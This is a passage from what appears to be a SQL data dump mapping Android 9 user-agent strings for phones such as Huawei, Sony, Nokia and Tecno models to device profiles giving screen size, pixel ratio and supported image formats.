SNE-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SNE-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SNE-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-01L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-01M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-02K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-02L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-03L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-04J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-04K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SO-05K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SOV36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SOV37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SOV38) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SOV39) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SOV42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; STF-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; STF-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; STF-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; STF-L09S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; STK-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; STK-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; STK-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; STK-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Star) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; T5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; T780H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1004) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1012) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1024) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1025) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1027) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1033) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1038) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1039) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1041) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1044) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1052) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TA-1053) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO AB7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO BB4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO BB4k) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO CB7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO CC6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO CC7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO CC9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO KB7j) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO KB8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO KC1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO KC2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO KC2j) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO KC3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO KC6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO KC8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO LB8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":774,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO LB8a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":774,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO LC6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO LC6a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; TECNO RA8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Titan_T3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Trekker-X4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":424,\"screenHeight\":753,\"pixelRatio\":2.55,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; UMIDIGI X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":774,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Ulefone_Note 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Ulefone_S11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VCE-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VFD 630) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":339,\"screenHeight\":705,\"pixelRatio\":2.125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VFD 730) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VIA_G4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VIVO GO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VKY-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VKY-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VKY-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VOG-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VOG-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VOG-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VOG-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VOG-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VS988) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VS996) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; VTR-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 